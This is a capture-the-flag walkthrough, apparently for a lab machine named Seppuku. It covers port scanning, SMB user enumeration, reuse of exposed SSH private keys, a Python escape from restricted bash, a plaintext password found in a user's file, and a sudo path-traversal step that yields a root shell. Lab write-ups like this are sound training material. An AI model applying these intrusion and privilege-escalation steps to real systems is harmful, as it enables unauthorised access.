GitHubPsMapExec

Samurai

Nmap

sudo nmap 192.168.104.90 -p- -sS -sV

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 3.0.3
22/tcp   open  ssh           OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open  http          nginx 1.14.2
139/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
7080/tcp open  ssl/empowerid LiteSpeed
7601/tcp open  http          Apache httpd 2.4.38 ((Debian))
8088/tcp open  http          LiteSpeed httpd
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Starting off on this machine we find that port 80 is restricted by a HTTP-basic-auth login.

I decided against bruteforcing for the moment and move straight on to other ports on the machine. Looking at port 445 for SMB I run enum4linux against the target and discovered some user accounts.

enum4linux -u '' -p '' -a 192.168.104.90

We have discovered the following users:\

  • seppuku

  • samurai

  • tanto

Otherwise with no open shares on SMB we move onto enumerating port 7601 of which in the browser takes us to the following below:

Running dirsearch.py against this port reveals the /keys/ directory.

python3 dirsearch.py -u http://192.168.104.90:7601  -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 60 --full-url

Private and private.bak contain RSA keys. I moved the key over to my desktop, renamed to id_rsa and used chmod to set appropriate permissions.

chmod 600 id_rsa

Knowing of the three users on the target machine we can guess and login to SSH. I was able to login with the user tanto.

ssh -i id_rsa tanto@192.168.172.90

Once logged in as tanto we see we are restricted in rbash and unable to run some commands. I used the following command sequence to first escape rbash then export a new path then finally updated to a Python shell again.

python -c 'import os; os.system("/bin/sh")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
python -c 'import pty; pty.spawn("/bin/bash")'

Once we can move around the box again I moved into the seppuku users directory. The file .passwd is of interest and contains the password: 12345685213456!@!@A

This password did not work for the user seppku but I was able to use su and the password to login as the user samurai.

I then transferred linpeas over to the attacking machine which soon picked up sudo permissions.

Open another tab and log in as tanto on SSH again. The create the directory and file so we can execute as the user samurai. Once the directory and bin file has been created echo in a bash shell then chmod to make it executable.

mkdir .cgi_bin
cd .cgi_bin
echo '/bin/bash' > bin
chmod 755 bin

Then on our other tab execute the file with the following command to gain root shell:

sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/*

Last updated